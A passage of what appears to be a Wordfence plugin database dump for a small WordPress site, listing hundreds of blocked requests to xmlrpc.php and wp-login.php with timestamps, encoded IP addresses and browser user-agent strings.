Wordfence Security Network',NULL),(10754,0.000000,1631033443.221151,'\0\0\0\0\0\0\0\0\0\0���Do�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10755,0.000000,1631033778.161729,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10756,0.000000,1631033783.580271,'\0\0\0\0\0\0\0\0\0\0��-@6�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10757,0.000000,1631034323.049870,'\0\0\0\0\0\0\0\0\0\0��?�)',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10758,0.000000,1631034331.338711,'\0\0\0\0\0\0\0\0\0\0��E��}',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10759,0.000000,1631034884.251995,'\0\0\0\0\0\0\0\0\0\0���Y3�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10760,0.000000,1631035453.369488,'\0\0\0\0\0\0\0\0\0\0���[a�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10761,0.000000,1631035459.894881,'\0\0\0\0\0\0\0\0\0\0��]r��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10762,0.000000,1631036013.580523,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10763,0.000000,1631036021.871196,'\0\0\0\0\0\0\0\0\0\0��\r^�,',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10764,0.000000,1631036593.743264,'\0\0\0\0\0\0\0\0\0\0��N�Q�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10765,0.000000,1631036603.780137,'\0\0\0\0\0\0\0\0\0\0��=C�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10766,0.000000,1631037166.358837,'\0\0\0\0\0\0\0\0\0\0��e�+',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10767,0.000000,1631037168.178690,'\0\0\0\0\0\0\0\0\0\0��\"���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10768,0.000000,1631037748.846200,'\0\0\0\0\0\0\0\0\0\0����*J',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10769,0.000000,1631037749.824592,'\0\0\0\0\0\0\0\0\0\0����E.',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10770,0.000000,1631038303.104117,'\0\0\0\0\0\0\0\0\0\0��@�N�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10771,0.000000,1631038325.100945,'\0\0\0\0\0\0\0\0\0\0��6\'1�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10772,0.000000,1631038907.997140,'\0\0\0\0\0\0\0\0\0\0��ms��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10773,0.000000,1631038912.365268,'\0\0\0\0\0\0\0\0\0\0��hƬD',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10774,0.000000,1631039225.507958,'\0\0\0\0\0\0\0\0\0\0��g|\\�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10775,0.000000,1631039483.445013,'\0\0\0\0\0\0\0\0\0\0����N',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10776,0.000000,1631039485.894993,'\0\0\0\0\0\0\0\0\0\0���� ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10777,0.000000,1631040072.477378,'\0\0\0\0\0\0\0\0\0\0��l���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10778,0.000000,1631040080.666601,'\0\0\0\0\0\0\0\0\0\0��E���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10779,0.000000,1631040638.910953,'\0\0\0\0\0\0\0\0\0\0���;��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10780,0.000000,1631041238.231526,'\0\0\0\0\0\0\0\0\0\0��3Q�x',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10781,0.000000,1631041239.707303,'\0\0\0\0\0\0\0\0\0\0��h�f�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10782,0.000000,1631041871.929090,'\0\0\0\0\0\0\0\0\0\0��#�1�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10783,0.000000,1631041878.579495,'\0\0\0\0\0\0\0\0\0\0��\'gI�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10784,0.000000,1631042476.158393,'\0\0\0\0\0\0\0\0\0\0��N/:�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10785,0.000000,1631042487.102594,'\0\0\0\0\0\0\0\0\0\0���Ҝ4',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10786,0.000000,1631043088.277732,'\0\0\0\0\0\0\0\0\0\0��Oe,',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10787,0.000000,1631043097.959292,'\0\0\0\0\0\0\0\0\0\0��_o�|',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10788,0.000000,1631043702.486449,'\0\0\0\0\0\0\0\0\0\0��/���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10789,0.000000,1631043703.341254,'\0\0\0\0\0\0\0\0\0\0���F�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10790,0.000000,1631044304.492792,'\0\0\0\0\0\0\0\0\0\0���;!�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10791,0.000000,1631044313.574512,'\0\0\0\0\0\0\0\0\0\0��\rJ��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10792,0.000000,1631044926.875217,'\0\0\0\0\0\0\0\0\0\0��-��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10793,0.000000,1631044942.093205,'\0\0\0\0\0\0\0\0\0\0��6\'�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10794,0.000000,1631045092.986006,'\0\0\0\0\0\0\0\0\0\0���$O',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10795,0.000000,1631045514.390967,'\0\0\0\0\0\0\0\0\0\0��gQW',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10796,0.000000,1631046149.543164,'\0\0\0\0\0\0\0\0\0\0��`}��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10797,0.000000,1631046165.981094,'\0\0\0\0\0\0\0\0\0\0���w',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10798,0.000000,1631046776.036862,'\0\0\0\0\0\0\0\0\0\0��]�xr',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10799,0.000000,1631046810.120524,'\0\0\0\0\0\0\0\0\0\0����B',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10800,0.000000,1631047434.303111,'\0\0\0\0\0\0\0\0\0\0���> z',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10801,0.000000,1631048052.501207,'\0\0\0\0\0\0\0\0\0\0�����F',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10802,0.000000,1631048072.822815,'\0\0\0\0\0\0\0\0\0\0��N�Q�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10803,0.000000,1631048705.535425,'\0\0\0\0\0\0\0\0\0\0��@��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10804,0.000000,1631048721.727096,'\0\0\0\0\0\0\0\0\0\0��-v�W',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10805,0.000000,1631049370.222090,'\0\0\0\0\0\0\0\0\0\0��e >�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10806,0.000000,1631049376.455787,'\0\0\0\0\0\0\0\0\0\0��>��G',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10807,0.000000,1631050001.555796,'\0\0\0\0\0\0\0\0\0\0��g��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10808,0.000000,1631050012.490128,'\0\0\0\0\0\0\0\0\0\0���A�O',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10809,0.000000,1631050663.657237,'\0\0\0\0\0\0\0\0\0\0����X�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10810,0.000000,1631050698.800698,'\0\0\0\0\0\0\0\0\0\0��-=��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10811,0.000000,1631050940.812215,'\0\0\0\0\0\0\0\0\0\0��%�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10812,0.000000,1631051360.311861,'\0\0\0\0\0\0\0\0\0\0����I�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10813,0.000000,1631052015.758488,'\0\0\0\0\0\0\0\0\0\0��g�6�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10814,0.000000,1631052026.588213,'\0\0\0\0\0\0\0\0\0\0��\rQ(',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10815,0.000000,1631052670.191903,'\0\0\0\0\0\0\0\0\0\0��@��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10816,0.000000,1631052685.491125,'\0\0\0\0\0\0\0\0\0\0��g�6�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10817,0.000000,1631053340.704418,'\0\0\0\0\0\0\0\0\0\0���G�k',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10818,0.000000,1631053357.650783,'\0\0\0\0\0\0\0\0\0\0���;=�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10819,0.000000,1631054049.740075,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10820,0.000000,1631054707.091564,'\0\0\0\0\0\0\0\0\0\0���\n',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10821,0.000000,1631055392.323353,'\0\0\0\0\0\0\0\0\0\0����2',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10822,0.000000,1631055397.168134,'\0\0\0\0\0\0\0\0\0\0���Gڿ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10823,0.000000,1631056084.895475,'\0\0\0\0\0\0\0\0\0\0���KG�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10824,0.000000,1631056085.296768,'\0\0\0\0\0\0\0\0\0\0���;��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10825,0.000000,1631056785.975896,'\0\0\0\0\0\0\0\0\0\0��-wT�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10826,0.000000,1631056815.719760,'\0\0\0\0\0\0\0\0\0\0����%+',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10827,0.000000,1631057024.671410,'\0\0\0\0\0\0\0\0\0\0����?�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10828,0.000000,1631057486.805814,'\0\0\0\0\0\0\0\0\0\0��g|]�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10829,0.000000,1631057516.601100,'\0\0\0\0\0\0\0\0\0\0��X�$�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10830,0.000000,1631058181.408203,'\0\0\0\0\0\0\0\0\0\0��g|]�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10831,0.000000,1631058882.321420,'\0\0\0\0\0\0\0\0\0\0�����F',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10832,0.000000,1631058918.892165,'\0\0\0\0\0\0\0\0\0\0����%+',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10833,0.000000,1631059583.584825,'\0\0\0\0\0\0\0\0\0\0���Aێ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10834,0.000000,1631059616.214925,'\0\0\0\0\0\0\0\0\0\0��4�w%',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10835,0.000000,1631060299.164848,'\0\0\0\0\0\0\0\0\0\0����\'B',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10836,0.000000,1631060313.355252,'\0\0\0\0\0\0\0\0\0\0��k�X�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10837,0.000000,1631061009.415036,'\0\0\0\0\0\0\0\0\0\0��t>f�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10838,0.000000,1631061025.910847,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10839,0.000000,1631061740.096928,'\0\0\0\0\0\0\0\0\0\0��1���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10840,0.000000,1631061768.504066,'\0\0\0\0\0\0\0\0\0\0��g�t�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10841,0.000000,1631062492.699162,'\0\0\0\0\0\0\0\0\0\0���X�$',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10842,0.000000,1631062501.035576,'\0\0\0\0\0\0\0\0\0\0��l�7�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10843,0.000000,1631063239.897830,'\0\0\0\0\0\0\0\0\0\0����*J',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10844,0.000000,1631063241.446950,'\0\0\0\0\0\0\0\0\0\0��gR',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10845,0.000000,1631063998.231888,'\0\0\0\0\0\0\0\0\0\0���c9',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10846,0.000000,1631064763.959489,'\0\0\0\0\0\0\0\0\0\0��#Ɖ�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10847,0.000000,1631064769.910202,'\0\0\0\0\0\0\0\0\0\0����*J',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux 